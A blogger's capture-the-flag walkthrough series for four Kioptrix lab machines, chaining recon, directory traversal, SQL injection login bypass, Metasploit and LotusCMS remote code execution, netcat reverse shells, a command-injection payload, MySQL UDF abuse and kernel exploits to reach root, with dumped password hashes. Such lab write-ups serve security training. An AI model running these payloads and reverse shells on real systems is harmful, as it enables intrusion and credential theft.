Write-up for Kioptrix Virtual Machines from Vulnhub

lvl01_kioptrix_01

I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs.

For your convenience, the following are the 5 write-ups on Kioptrix machines,

Cheerios!

Write-up for Kioptrix: 2014 (#5)

This is the finale post of the kioptrix series writeup.

lvl-5-000

Perform hosts discovery using nmap
> nmap -Pn 192.168.117.0/24 -T5 –version-light

Nmap scan report for 192.168.117.133
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:BD:C5:DD (VMware)

Only two ports?

Let’s use the directory buster to check if there is any interesting webpages or login form,
> dirb http://192.168.117.133

+ http://192.168.117.133/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.117.133/index.html (CODE:200|SIZE:152)
> dirb http://192.168.117.133:8080
+ http://192.168.117.133:8080/cgi-bin/ (CODE:403|SIZE:210)

No luck!

Perform Nikto vulnerability scan on the servers
> nikto -h http://192.168.117.133

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.117.133
+ Target Hostname: 192.168.117.133
+ Target Port: 80
+ Start Time: 2016-10-27 13:52:44 (GMT8)
—————————————————————————
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

We will look into this again if required. Let’s try to navigate to the web page first.

Navigating to the website hosted on HTTP server port 8080 – it says that I don’t have the permission to access the page.

lvl-5-001

Moving on to the HTTP server port 80, it gives me the default page saying “It Works”.

lvl-5-002

However, the good news is that its source contains something that is not included in the default page.

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Let’s try to navigate to the mentioned URL:
> 192.168.117.133/pChart2.1.3/index.php

lvl-5-003

Google for known vulnerabilities

Indeed, check out this website, it basically documented the multiple vulnerabilities which existed in pChart version 2.1.3 – which consists of directory traversal and cross-site scripting.

Perform directory traversal

Using the instructions shown on the website I shared earlier, we can perform directory using the following sample code reference,

“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”

In our case, run the exact following line (replace to your target’s IP address, of course)
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Directory traversal is working. Remember the page at port 8080, the one which denies me from viewing due to insufficient file permission?

Let’s check out the apache HTTP server settings to see what were its settings and configurations.

Note that this is a FreeBSD server, which means that the config file is located at /usr/local/etc/apache2x/httpd.conf
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Bingo, it works.

lvl-5-004

The following is suspiciously interesting,

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

It basically means that the results will only be allowed to shown on Mozilla Firefox browser 4.

After some research, I have gotten the user agent information of Mozilla 4,

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

To use it, there are many ways. For me, I uses a Firefox plugin called Quick Preference Button. It has a lot of components with it, but you just have to change the item under Prefs>Spoof>Custom and then enter the above user agent information.

lvl-5-005

Now that you are accessing the web site using Mozilla 4 user agent, you can finally view the page,

lvl-5-006

The phptax web page information looks pretty old school.

lvl-5-007

Did some research, noticed that there are readily available modules in Metasploit to exploit on phptax.
> msfconsole
> search phptax

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/phptax_exec 2012-10-08 excellent PhpTax pfilez Parameter Exec Remote Code Injection

> use exploit/multi/http/phptax_exec
> set rhost 192.168.117.133
> set rport 8080
> exploit

[*] Started reverse TCP double handler on 192.168.117.128:4444
[*] 192.168.117.1338080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo UPBXBAbsRsBHMrXp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo PLFkF52o2dwDMsR3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “UPBXBAbsRsBHMrXp\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “PLFkF52o2dwDMsR3\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.117.128:4444 -> 192.168.117.133:48546) at 2016-10-27 14:51:35 +0800
[*] Command shell session 2 opened (192.168.117.128:4444 -> 192.168.117.133:63426) at 2016-10-27 14:51:35 +0800

> id

uid=80(www) gid=80(www) groups=80(www)

Now we have a limited shell as user www.

Check the kernel version
> uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

Search for vulnerability on FreeBSD version 9.0
> Check out FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Download and host the exploit code on your attacker machine
> nc -lvp 6666 < getr00t.c

Download it using the limited shell at your target machine
> nc -nv 192.168.117.133 6666 > r00t.c

Finally, compile the code
> gcc r00t.c
> ./a.out

[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!

> id

uid=0(root) gid=0(wheel) groups=0(wheel)

Congrats, you are now root!

> cd /root
> cat congrats.txt

If you are reading this, it means you got root (or cheated).
Congratulations either way…

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can’t enjoy them.

As with all my VMs, besides getting “root” on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and “hope” it works, but think about the traffic.. the logs… Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won’t from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren’t in “/var/log/apache/access.log”, but in “/var/log/httpd-access.log”.
It’s default document root is not “/var/www/” but in “/usr/local/www/apache22/data”.
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn’t support “iNotify”, I couldn’t use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should’ve detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good…

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part 🙂
Here we conclude the Kioptrix CTF series.
Cheers.

And yes, this concludes my Kioptrix series write-up! Cheers.

Write-up for Kioptrix: Level 1.3 (#4)

Once again, a continuation of the Kioptrix series writeup!

First of all, something different about the VM for Kioptrix level 1.3 (#4) is that unlike the rest of the previous VMs, #4 only comes with a Virtual Machine Disk (VMDK) file. As such, you cannot open it normally like what you have done for the past VMs.

Click here to view my step-by-step guide to create a VM using existing VMDK file, which is ideal in this case. 

lvl-4-000

Scan for the VM using nmap
> nmap 192.168.117.100-200 -Pn -T5

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-26 21:29 SGT
Nmap scan report for 192.168.117.132
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7C:1F:EC (VMware)
Scan the web server for possible web pages

Run Directory Buster
> dirb http://192.168.117.132

—- Scanning URL: http://192.168.117.132/ —-
+ http://192.168.117.132/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.117.132/images/
+ http://192.168.117.132/index (CODE:200|SIZE:1255)
+ http://192.168.117.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.117.132/john/
+ http://192.168.117.132/logout (CODE:302|SIZE:0)
+ http://192.168.117.132/member (CODE:302|SIZE:220)
+ http://192.168.117.132/server-status (CODE:403|SIZE:335)

—- Entering directory: http://192.168.117.132/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.117.132/john/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

Run GoBuster
> gobuster -u ‘http://192.168.117.132’ -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.117.132/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/images (Status: 301)
/index (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)

Visit the webpage hosted on target machine

lvl-4-001

lvl-4-002

lvl-4-003

lvl-4-004

lvl-4-005

lvl-4-006

Perform SQL Injection

Back to the login back, let’s try to log in as john or Robert

lvl-4-007

Simply enter the following into the login field
> username: john
> password: ‘ or 1=1 — 

lvl-4-008

Do the same using username “robert” and you will have the following 2 credentials for login,

  • john / MyNameIsJohn
  • robert / ADGAdsafdfwt4gadfga==

Login via SSH
> ssh [email protected]

lvl-4-009

> ssh [email protected]

lvl-4-010

Both users are using lshell, which is a limited shell based on Python.

After some research, seems like it is possible to escape from this shell by using the echo command to call os.system

> echo os.system(‘/bin/bash’)
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> ls -la /home/loneferret

total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r–r– 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r–r– 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r–r– 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw——- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw——- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw——- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw——- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r–r– 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r–r– 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

Check MySQL is being run by which user
> ps -ef | grep mysql

root 4892 1 0 Oct29 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 4934 4892 0 Oct29 ? 00:00:04 /usr/sbin/mysqld –basedir=/usr
root 4935 4892 0 Oct29 ? 00:00:00 logger -p daemon.err -t mysqld_s
john 6119 6071 0 00:57 pts/0 00:00:00 grep mysql

Good news, seems like MySQL is running as root. Let’s see if its login credentials are hard-coded in the HTTP server configuration file
> ls /var/www

checklogin.php images john logout.php robert
database.sql index.php login_success.php member.php

> cat /var/www/checklogin.php

[ … omitted … ]
$host=”localhost”; // Host name
$username=”root”; // Mysql username
$password=””; // Mysql password
$db_name=”members”; // Database name
$tbl_name=”members”; // Table name
[ … omitted … ]

Login to MySQL as user root
> mysql -u root -h localhost

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

After some research, seems like we can perform privilege escalation from a MySQL server running as root.

In essence, since we are able to access MySQL server as root, we can utilize this permission level to run something called User Defined Functions (UDF) to perform privilege escalation.

To do so, we need to download the lib_mysqludf_sys.so library, which will allow us to perform commands that can achieved our goal.

The following are its most commonly used functions,

  • sys_eval (executes an arbitrary command, and returns its output)
  • sys_exec (executes an arbitrary command, and returns it’s exit code)

However, the good news is that there is no need to download them in this case because they already exists in the VM. Thanks the creator!
> whereis lib_mysqludf_sys.so

/usr/lib/lib_mysqludf_sys.so

mysql> SELECT sys_exec(‘chown john.john /etc/shadow’);

+—————————————–+
| sys_exec(‘chown john.john /etc/shadow’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown john.john /etc/passwd’);

+—————————————–+
| sys_exec(‘chown john.john /etc/passwd’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown -R john.john /root’);

+————————————–+
| sys_exec(‘chown -R john.john /root’) |
+————————————–+
| NULL |
+————————————–+
1 row in set (0.01 sec)

> cat /root/congrats.txt

Congratulations!

You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
Loneferret

No, not yet. We are not root yet, only managed to read the files of root.
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> cat /etc/shadow

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::

Now, modify the /etc/passwd file and remove the ‘x’ as highlighted in red below

root:x:0:0:root:/root:/bin/bash

Modify the /etc/shadow file and remove the chars as highlighted in red below

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::

Back to MySQL again, we will change the owner of ssh config files to john

mysql> SELECT sys_exec(‘chown -R john.john /etc/ssh’);

+—————————————–+
| sys_exec(‘chown -R john.john /etc/ssh’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

Modify the /etc/ssh/sshd_config file and identify the following line as highlighted in red. Change it to yes.

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

And also find the following line, as highlighted in red. It should be at the very last line. Change it to no.

UsePAM yes

We are done with the edits. Save the file now and reboot the system for the changes to take effect.

> mysql> SELECT sys_exec(‘reboot’);
> ssh [email protected]
>id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now logged in as root!

I came across an even faster way to get root.

Simply login to MySQL and run the following command to add robert into the admin group, so that he is able to perform sudo as an administrator.
> select sys_exec(‘usermod -a -G admin robert’);

+—————————————-+
| sys_exec(‘usermod -a -G admin robert’) |
+—————————————-+
| NULL |
+—————————————-+
1 row in set (0.03 sec)

Now, perform the sudo su command using robert account.

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami
root

There you go, root!

Write-up for Kioptrix: Level 1.2 (#3)

This is a continuation of the Kioptrix series writeup, level 1.2, Virtual Machine (VM) number 3.

Add target server to list of hosts

lvl-3-000

First of all, let’s modify your hosts file as per instructed by the creator on the website Kioptrix level 1.2 (#3) on Vulnhub, or simply refer to the above screenshot.

We should edit the host file to point the target server to kioptrix3.com. Below is the snippet, I modified it slightly,

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

  • Under Windows, edit C:\Windows\System32\drivers\etc\hosts
  • Under Linux, edit /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this

Perform network discovery on your network to find the host
> nmap -Pn 192.168.117.0/24

Nmap scan report for kioptrix3.com (192.168.117.131)
Host is up (0.00040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:D1:8E:A1 (VMware)

Run Directory Buster
> dirb http://192.168.117.131

—- Scanning URL: http://192.168.117.131/ —-
==> DIRECTORY: http://192.168.117.131/cache/
==> DIRECTORY: http://192.168.117.131/core/
+ http://192.168.117.131/data (CODE:403|SIZE:326)
+ http://192.168.117.131/favicon.ico (CODE:200|SIZE:23126)
==> DIRECTORY: http://192.168.117.131/gallery/
+ http://192.168.117.131/index.php (CODE:200|SIZE:1819)
==> DIRECTORY: http://192.168.117.131/modules/
==> DIRECTORY: http://192.168.117.131/phpmyadmin/

I must say that we have found some interesting sites. Both the modules and phpmyadmin page seems to give us quite a bit of information on its version.

lvl-3-001

lvl-3-002

Now back to normal navigation, they have a normal index page as shown below, and it has links for admin login page.

lvl-3-003

lvl-3-004

Oh, check this out, they uses LotusCMS.

Google for LotusCMS vulnerability

Found an exploitation script, let’s download it
> wget ‘https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh’

Setup listener on your attacker machine
> nc -lvp 6666

Run the exploit
> ./lotusRCE.sh 192.168.117.131

Path found, now to check for vuln….

Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell….
what IP to use?
192.168.117.128
What PORT?
6666

OK, open your local listener and choose the method for back connect:

1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

There you go, your listener should have received a reverse shell now.

connect to [192.168.117.128] from kioptrix3.com [192.168.117.131] 57841

Check your id 
> id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Good, now you have a limited shell as user www-data.

Dump the list of users and see their home directory
> cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Check out the non-standard users, such as loneferret
> cd /home/loneferret/
> ls -l

total 32
-rw-r–r– 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh

View the CompanyPolicy file
> cat CompanyPolicy.README

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command ‘sudo ht’.
Failure to do so will result in you immediate termination.

DG
CEO

Nothing interesting. Now, back to the starting page,
> cd /home/www/kioptrix3.com
> ls

cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php

Perform a search on any PHP files which contains “config” in the file name, maybe we can get some interesting hardcoded information from them
> find . -name ‘*.php’ | grep config

./gallery/gconfig.php
./data/config/index.php

View the configuration file
> cat ./gallery/gconfig.php

[ … omitted]
$GLOBALS[“gallarific_path”] = “http://kioptrix3.com/gallery”;
$GLOBALS[“gallarific_mysql_server”] = “localhost”;
$GLOBALS[“gallarific_mysql_database”] = “gallery”;
$GLOBALS[“gallarific_mysql_username”] = “root”;
$GLOBALS[“gallarific_mysql_password”] = “fuckeyou”;
[ … omitted]

We have gotten a sql login credentials, nice. The other file “./data/config/index.php” is empty though.

The credentials are legit, login success at phpmyadmin!

lvl-3-005

Now is time to use some of your favorite password decrypt website or tools. Once you are done, you will find out that the following are the passwords,

dreg: Mast3r
loneferret: starwars

Login to the server via SSH (remember that now, you are ‘new employees’ as mentioned in the company policy just now)
> ssh [email protected]
> sudo -l

[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.

No luck. Let’s try the other user.

> ssh [email protected]
> sudo -l

User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

Great. loneferret is allowed to run HT Editor as sudo!

Run the HT Editor as sudo
> /usr/local/bin/ht

From here, we follow the instructions to open the /etc/sudoer file to make modification so we can run other programs as sudo
* Press F3 to open file

lvl-3-006

Enter file name to open (reference as above)
> /etc/sudoers

lvl-3-007

Add the following line in the privilege specification (reference as above)
> /bin/bash
* Press F2 to save

Now run the following to gain root access
> sudo /bin/bash
> id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now root!

Write-up for Kioptrix: Level 1.1 (#2)

If you prefer watching a beginner friendly step-by-step walkthrough video with explanations:
VulnHub Kioptrix Level 1.1 CTF Walkthrough – Step-by-step with Explanations

This is a continuation from the Kioptrix Virtual Machines (VM) on VulnHub.

Click to view Writeup for Kioptrix level 1 (#1) VM.

lvl-2-000

Let’s get started!

Scan the network using nmap to discover hosts
> nmap -sS -T5 192.168.117.0/24

Nmap scan report for 192.168.117.130

Host is up (0.00018s latency).

Not shown: 994 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

443/tcp  open  https

631/tcp  open  ipp

3306/tcp open  mysql

MAC Address: 00:0C:29:A1:02:89 (VMware)

Navigate to the website using a browser (port 80) 

lvl-2-001

Wow, there is a login page. Let’s test for SQL Injection vulnerability

Enter the following input as the username (take note of the space behind):

‘ or 1=1 — 

And we are in!

lvl-2-002pngNow let’s try the options and see if they works.

lvl-2-003

Well, it works!

Setup netcat listener on your machine, port 6666
> nc -lvp 6666

lvl-2-004

Perform netcat connectivity on target machine and spawn a reverse shell (refer to above image)

192.168.117.128; /usr/local/bin/nc 192.168.117.128 6666 -e /bin/sh

Observe the terminal which you are running the netcat listener

root@kali:~/Desktop/kioptrix# nc -lvp 6666
listening on [any] 6666 …
192.168.117.130: inverse host lookup failed: Unknown host
connect to [192.168.117.128] from (UNKNOWN) [192.168.117.130] 32771
id
uid=48(apache) gid=48(apache) groups=48(apache)

Now you have a shell as user apache.

Check systme kernel version
> uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Google for vulnerability on “Linux kernel 2.6.9-55”

Check out : CVE-2009-2698, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

Download the exploit code to your machine
> cd /tmp
> wget ‘https://www.exploit-db.com/download/9542’

Transfer the exploit code to the target machine
> service apache2 start
> cd /var/www/html/
> mv ~/Desktop/kioptrix/9542.c .

Download the file from target machine
> wget ‘http://192.168.117.128/9542.c’

–23:44:28– http://192.168.117.128/9542.c
=> `9542.c’
Connecting to 192.168.117.128:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 280.27 MB/s

23:44:28 (280.27 MB/s) – `9542.c’ saved [2645/2645]

The download is a successful.

Compile your exploit on target machine
> gcc 9542.c
> ls

9542.c
a.out

Run your exploit to get root
> ./a.out

sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Congrats, you have gotten root.